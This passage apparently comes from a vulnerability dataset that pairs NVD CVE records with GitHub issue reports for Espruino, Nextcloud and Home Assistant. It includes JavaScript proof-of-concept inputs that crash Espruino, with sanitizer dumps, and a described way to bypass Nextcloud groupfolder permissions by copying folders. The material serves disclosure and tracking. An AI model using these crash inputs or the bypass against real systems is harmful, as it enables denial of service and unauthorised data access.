3,295
CVE-2022-25044
2022-03-05T02:15:06.900
Espruino 2v11.251 was discovered to contain a stack buffer overflow via src/jsvar.c in jsvNewFromString.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/espruino/Espruino/commit/e069be2ecc5060ef47391716e4de94999595b260" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/espruino/Espruino/issues/2142" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/espruino/Espruino/commit/e069be2ecc5060ef47391716e4de94999595b260" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/espruino/Espruino/issues/2142" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:espruino:espruino:2.11.251:*:*:*:*:*:*:*", "matchCriteriaId": "F24AA233-1A59-441A-BE52-01F1A375F437", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/espruino/Espruino/issues/2142
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "espruino", "Espruino" ]
### Environment ``` OS : Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux Commit : a8c74cbe557924dec90cc0da4f7a6a180a1a47d6 Version : 2v11 Build : CFLAGS += -fsanitize=address -fno-omit-frame-pointer ``` ### Proof of concept ``` function main() { var a0 = 0xdeadbeef; var a1 = 0xdeadbeef; var a2 = /\D/; var a5 = Uint8ClampedArray(52251); var a6 = 0xdeadbeef; var a7 = 0xdeadbeef; var a10 = 0xdeadbeef; function a11() { var a14 = 0xdeadbeef; var a15 = 0xdeadbeef; var a16 = 0xdeadbeef; var a18 = 0xdeadbeef; var a20 = [-111111.222222222,-111111.222222222,Infinity,-111111.222222222,-111111.222222222]; var a21 = a20.join(); var a23 = [0xde,0xde,0xde,0xde]; var a24 = 0xdeadbeef; var a26 = 0xdeadbeef; var a27 = 0xdeadbeef; var a28 = 0xdeadbeef; var a29 = 0xdeadbeef; var a30 = 0xdeadbeef; var a31 = 0xdeadbeef; var a33 = 0xdeadbeef; var a34 = 0xdeadbeef; var a38 = 0xdeadbeef; var a39 = 0xdeadbeef; var a42 = 0xdeadbeef; var a45 = 0xdeadbeef; var a35 = InternalError(); var a36 = delete a21.constructor; var a41 = [0xde,0xde,0xde,0xde]; var a43 = [0xde,0xde,0xde,0xde]; var a44 = [0xde,0xde,0xde,0xde]; var a46 = /U\d/; var a48 = [0xde,0xde,0xde,0xde]; Array[133713371337] <<= 133713371337; var a52 = [-111111.222222222,-111111.222222222,-111111.222222222,-111111.222222222,-111111.222222222]; var a53 = delete a52.__proto__; a52.valueOf = 255; var a56 = Date("q1iq"); a41.__proto__ = a46; var a57 = 0xdeadbeef; var a58 = 0xdeadbeef; var a59 = 0xdeadbeef; var a61 = 0xdeadbeef; var a62 = 0xdeadbeef; var a60 = [0xde,0xde,0xde,0xde]; var a63 = 0; var a64 = a63++; } var a67 = a11(); var a68 = a11(); } main(); ``` ### Stack dump ``` ================================================================= ==3665868==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc3be0ba49 at pc 0x0000004e2087 bp 0x7ffc3be0b690 sp 0x7ffc3be0b688 READ of size 2 at 0x7ffc3be0ba49 thread T0 #0 0x4e2086 in jsvIsArray /home/q1iq/Documents/origin/Espruino/src/jsvar.c:108:51 #1 0x4f5d90 in jsvGetArrayLength /home/q1iq/Documents/origin/Espruino/src/jsvar.c:2942:3 #2 0x6479c2 in jswrap_date_constructor /home/q1iq/Documents/origin/Espruino/src/jswrap_date.c:212:7 #3 0x512238 in jsnCallFunction /home/q1iq/Documents/origin/Espruino/src/jsnative.c:223:18 #4 0x5184ea in jspeFunctionCall /home/q1iq/Documents/origin/Espruino/src/jsparse.c:609:21 #5 0x51c11d in jspeFactorFunctionCall /home/q1iq/Documents/origin/Espruino/src/jsparse.c:1184:11 #6 0x5227fa in jspePostfixExpression /home/q1iq/Documents/origin/Espruino/src/jsparse.c:1787:9 #7 0x522d49 in jspeUnaryExpression /home/q1iq/Documents/origin/Espruino/src/jsparse.c:1813:12 #8 0x523b18 in jspeBinaryExpression /home/q1iq/Documents/origin/Espruino/src/jsparse.c:1956:33 #9 0x524028 in jspeConditionalExpression /home/q1iq/Documents/origin/Espruino/src/jsparse.c:1992:38 #10 0x524bb8 in jspeAssignmentExpression /home/q1iq/Documents/origin/Espruino/src/jsparse.c:2051:37 #11 0x525f02 in jspeStatementVar /home/q1iq/Documents/origin/Espruino/src/jsparse.c:2166:34 #12 0x52cddb in jspeStatement /home/q1iq/Documents/origin/Espruino/src/jsparse.c:2770:12 #13 0x5252f0 in jspeBlockNoBrackets /home/q1iq/Documents/origin/Espruino/src/jsparse.c:2085:18 #14 0x51991d in jspeFunctionCall /home/q1iq/Documents/origin/Espruino/src/jsparse.c:796:15 #15 0x51c11d in jspeFactorFunctionCall /home/q1iq/Documents/origin/Espruino/src/jsparse.c:1184:11 #16 0x5227fa in jspePostfixExpression /home/q1iq/Documents/origin/Espruino/src/jsparse.c:1787:9 #17 0x522d49 in jspeUnaryExpression /home/q1iq/Documents/origin/Espruino/src/jsparse.c:1813:12 #18 0x523b18 in jspeBinaryExpression /home/q1iq/Documents/origin/Espruino/src/jsparse.c:1956:33 #19 0x524028 in jspeConditionalExpression /home/q1iq/Documents/origin/Espruino/src/jsparse.c:1992:38 #20 0x524bb8 in jspeAssignmentExpression /home/q1iq/Documents/origin/Espruino/src/jsparse.c:2051:37 #21 0x525f02 in jspeStatementVar /home/q1iq/Documents/origin/Espruino/src/jsparse.c:2166:34 #22 0x52cddb in jspeStatement /home/q1iq/Documents/origin/Espruino/src/jsparse.c:2770:12 #23 0x5252f0 in jspeBlockNoBrackets /home/q1iq/Documents/origin/Espruino/src/jsparse.c:2085:18 #24 0x51991d in jspeFunctionCall /home/q1iq/Documents/origin/Espruino/src/jsparse.c:796:15 #25 0x51c11d in jspeFactorFunctionCall /home/q1iq/Documents/origin/Espruino/src/jsparse.c:1184:11 #26 0x5227fa in jspePostfixExpression /home/q1iq/Documents/origin/Espruino/src/jsparse.c:1787:9 #27 0x522d49 in jspeUnaryExpression /home/q1iq/Documents/origin/Espruino/src/jsparse.c:1813:12 #28 0x523b18 in jspeBinaryExpression /home/q1iq/Documents/origin/Espruino/src/jsparse.c:1956:33 #29 0x524028 in jspeConditionalExpression /home/q1iq/Documents/origin/Espruino/src/jsparse.c:1992:38 #30 0x524bb8 in jspeAssignmentExpression /home/q1iq/Documents/origin/Espruino/src/jsparse.c:2051:37 #31 0x524c62 in jspeExpression /home/q1iq/Documents/origin/Espruino/src/jsparse.c:2057:16 #32 0x52c9ba in jspeStatement /home/q1iq/Documents/origin/Espruino/src/jsparse.c:2757:12 #33 0x5257f7 in jspeBlockOrStatement /home/q1iq/Documents/origin/Espruino/src/jsparse.c:2125:16 #34 0x525a93 in jspParse /home/q1iq/Documents/origin/Espruino/src/jsparse.c:2137:9 #35 0x52e8ad in jspEvaluateVar /home/q1iq/Documents/origin/Espruino/src/jsparse.c:2997:14 #36 0x52eb38 in jspEvaluate /home/q1iq/Documents/origin/Espruino/src/jsparse.c:3027:9 #37 0x63a7e8 in main /home/q1iq/Documents/origin/Espruino/targets/linux/main.c:460:15 #38 0x7fc5064350b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #39 0x41c59d in _start (/home/q1iq/Documents/origin/Espruino/espruino+0x41c59d) Address 0x7ffc3be0ba49 is located in stack of thread T0 at offset 329 in frame #0 0x510bef in jsnCallFunction /home/q1iq/Documents/origin/Espruino/src/jsnative.c:59 This frame has 6 object(s): [32, 128) 'argData' (line 87) [160, 256) 'doubleData' (line 90) [288, 296) 'result' (line 187) [320, 328) 'f116' (line 197) <== Memory access at offset 329 overflows this variable [352, 360) 'f165' (line 209) [384, 392) 'f211' (line 230) HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/q1iq/Documents/origin/Espruino/src/jsvar.c:108:51 in jsvIsArray Shadow bytes around the buggy address: 0x1000077b96f0: f8 f8 f8 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00 0x1000077b9700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000077b9710: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000077b9720: f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00 0x1000077b9730: f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 =>0x1000077b9740: f2 f2 f2 f2 00 f2 f2 f2 f8[f2]f2 f2 f8 f2 f2 f2 0x1000077b9750: f8 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00 0x1000077b9760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000077b9770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000077b9780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000077b9790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3665868==ABORTING ``` ### Credit Q1IQ(@Q1IQ)
stack-buffer-overflow jsvar.c:108:51 in jsvIsArray
https://api.github.com/repos/espruino/Espruino/issues/2142/comments
2
2022-02-08T12:58:50Z
2022-02-08T14:59:08Z
https://github.com/espruino/Espruino/issues/2142
1,127,223,414
2,142
3,296
CVE-2022-25465
2022-03-05T02:15:06.947
Espruino 2v11 release was discovered to contain a stack buffer overflow via src/jsvar.c in jsvGetNextSibling.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/espruino/Espruino/issues/2136" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/espruino/Espruino/issues/2136" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:espruino:espruino:2.11:*:*:*:*:*:*:*", "matchCriteriaId": "93283065-9BF1-451E-8744-DF2A1CB225EB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/espruino/Espruino/issues/2136
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "espruino", "Espruino" ]
## Environment ``` MacOS Version : 11.5.2 (Intel) Commit : a8c74cbe557924dec90cc0da4f7a6a180a1a47d6 Version : 2v11 ``` ## Build ``` CFLAGS += -fsanitize=address -fno-omit-frame-pointer ``` ## Proof of concept ``` function main() { var foo = Int16Array(31860); var buf = foo.reduce(Array); } main(); ``` ## Stack Dump ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==40754==ERROR: AddressSanitizer: stack-overflow on address 0x7ffee802dff0 (pc 0x0001073f2364 bp 0x7ffee802e010 sp 0x7ffee802dfe0 T0) #0 0x1073f2364 in jsvGetNextSibling jsvar.c:74 #1 0x1073f7f47 in jsvFreePtr jsvar.c:553 #2 0x1073f8ed4 in jsvUnLockFreeIfNeeded jsvar.c:723 #3 0x1073f87d0 in jsvUnLock jsvar.c:735 #4 0x1073f8047 in jsvFreePtr jsvar.c:569 #5 0x1073f8ed4 in jsvUnLockFreeIfNeeded jsvar.c:723 #6 0x1073f87d0 in jsvUnLock jsvar.c:735 #7 0x1073f842a in jsvFreePtr jsvar.c:642 #8 0x1073f8ed4 in jsvUnLockFreeIfNeeded jsvar.c:723 #9 0x1073f87d0 in jsvUnLock jsvar.c:735 #10 0x1073f8047 in jsvFreePtr jsvar.c:569 [···] #251 0x1073f8ed4 in jsvUnLockFreeIfNeeded jsvar.c:723 #252 0x1073f87d0 in jsvUnLock jsvar.c:735 #253 0x1073f842a in jsvFreePtr jsvar.c:642 #254 0x1073f8ed4 in jsvUnLockFreeIfNeeded jsvar.c:723 #255 0x1073f87d0 in jsvUnLock jsvar.c:735 SUMMARY: AddressSanitizer: stack-overflow jsvar.c:74 in jsvGetNextSibling ==40754==ABORTING ``` ## Credit Q1IQ(@Q1IQ)
stack-overflow jsvar.c:74 in jsvGetNextSibling
https://api.github.com/repos/espruino/Espruino/issues/2136/comments
1
2022-01-29T16:21:46Z
2022-06-08T14:50:40Z
https://github.com/espruino/Espruino/issues/2136
1,118,260,466
2,136
3,297
CVE-2021-41239
2022-03-08T18:15:07.873
Nextcloud server is a self hosted system designed to provide cloud style services. In affected versions the User Status API did not consider the user enumeration settings by the administrator. This allowed a user to enumerate other users on the instance, even when user listings where disabled. It is recommended that the Nextcloud Server is upgraded to 20.0.14, 21.0.6 or 22.2.1. There are no known workarounds.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-g722-cm3h-8wrx" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nextcloud/server/issues/27122" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nextcloud/server/pull/29260" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202208-17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-g722-cm3h-8wrx" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nextcloud/server/issues/27122" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nextcloud/server/pull/29260" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202208-17" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:*:*:*:*", "matchCriteriaId": "FE354750-B4B3-4F0A-8B59-472C527BC7B2", "versionEndExcluding": "20.0.14", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:*:*:*:*", "matchCriteriaId": "467AE8CC-B050-4A69-AD8A-88C71C69C898", "versionEndExcluding": "21.0.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "21.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:22.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "0FB174BF-D3FD-49C6-B216-3166DE1AD6F9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "862" ]
862
https://github.com/nextcloud/server/issues/27122
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nextcloud", "server" ]
There should be an option to globally disable the "Last statuses" widget. It leaks account names, which might be the desired behaviour, but might as well be not. On "semi-public" Nextcloud instances you usually don't want to expose other users to each other, which is also why e.g. `shareapi_allow_share_dialog_user_enumeration` can be disabled. Currently it's only possible to disable user_status altogether. It would be nice if there was the option to keep user_status enabled but disable the "Last statuses" widget.
user_status "last statuses" widget leaks account names
https://api.github.com/repos/nextcloud/server/issues/27122/comments
2
2021-05-26T16:08:07Z
2021-10-20T10:27:56Z
https://github.com/nextcloud/server/issues/27122
902,616,998
27,122
3,298
CVE-2021-41241
2022-03-08T19:15:07.927
Nextcloud server is a self hosted system designed to provide cloud style services. The groupfolders application for Nextcloud allows sharing a folder with a group of people. In addition, it allows setting "advanced permissions" on subfolders, for example, a user could be granted access to the groupfolder but not specific subfolders. Due to a lacking permission check in affected versions, a user could still access these subfolders by copying the groupfolder to another location. It is recommended that the Nextcloud Server is upgraded to 20.0.14, 21.0.6 or 22.2.1. Users unable to upgrade should disable the "groupfolders" application in the admin settings.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nextcloud/groupfolders/issues/1692" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-m4wp-r357-4q94" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nextcloud/server/pull/29362" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202208-17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nextcloud/groupfolders/issues/1692" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-m4wp-r357-4q94" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nextcloud/server/pull/29362" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202208-17" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:*:*:*:*", "matchCriteriaId": "FE354750-B4B3-4F0A-8B59-472C527BC7B2", "versionEndExcluding": "20.0.14", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:*:*:*:*", "matchCriteriaId": "467AE8CC-B050-4A69-AD8A-88C71C69C898", "versionEndExcluding": "21.0.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "21.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:22.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "0FB174BF-D3FD-49C6-B216-3166DE1AD6F9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "862" ]
862
https://github.com/nextcloud/groupfolders/issues/1692
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nextcloud", "groupfolders" ]
Example: Employee list / NC users: MA1 site manager MA2 accountant MA3 project employee Lisa MA4 project employee Hans NC folder structure (group folder): Group folder company location Berlin ...├── Administration ..........├── accounting ...├── projects ..........├── Project A ..........├── Project B The following should be set via “Advanced Permissions”: Write and read rights to all folders should have: MA1 site manager Write and read rights to accounting folders should have: only MA2 accountant Write and read rights to project folder A should have: only MA3 project employee Lisa Write and read rights to project folder B should have: only MA4 project employee Hans All of this is easy to set using the “Advanced Permissions” in the “Groupfolder”. However… For the root folder “Group folder company location Berlin”, all NC-users must have at least reading rights, otherwise you won’t see a folder at all… “MA4 Projektmitarbeiter Hans” does not initially see the “Administration-Accounting” folder. However, if he copies the complete root directory “Group folder company location Berlin” and inserts it into another of his own folders, all directories and their contents are visible to him. Can this copying of the “invisible” folder or in general be prevented somehow? How would you solve this problem? Thank’s for the Tipps. Matthias
Groupfolders for which a user has no reading-rights (Advanced Permissions) can still be copied and read out!
https://api.github.com/repos/nextcloud/groupfolders/issues/1692/comments
6
2021-10-11T13:47:33Z
2021-11-04T16:30:15Z
https://github.com/nextcloud/groupfolders/issues/1692
1,022,729,010
1,692
3,299
CVE-2020-36517
2022-03-10T17:41:21.183
An information leak in Nabu Casa Home Assistant Operating System and Home Assistant Supervised 2022.03 allows a DNS operator to gain knowledge about internal network resources via the hardcoded DNS resolver configuration.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/17" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/20" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/22" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/50" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/51" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/53" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/54" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/6" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/64" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/70" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/55" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/56" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/58" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/59" }, { 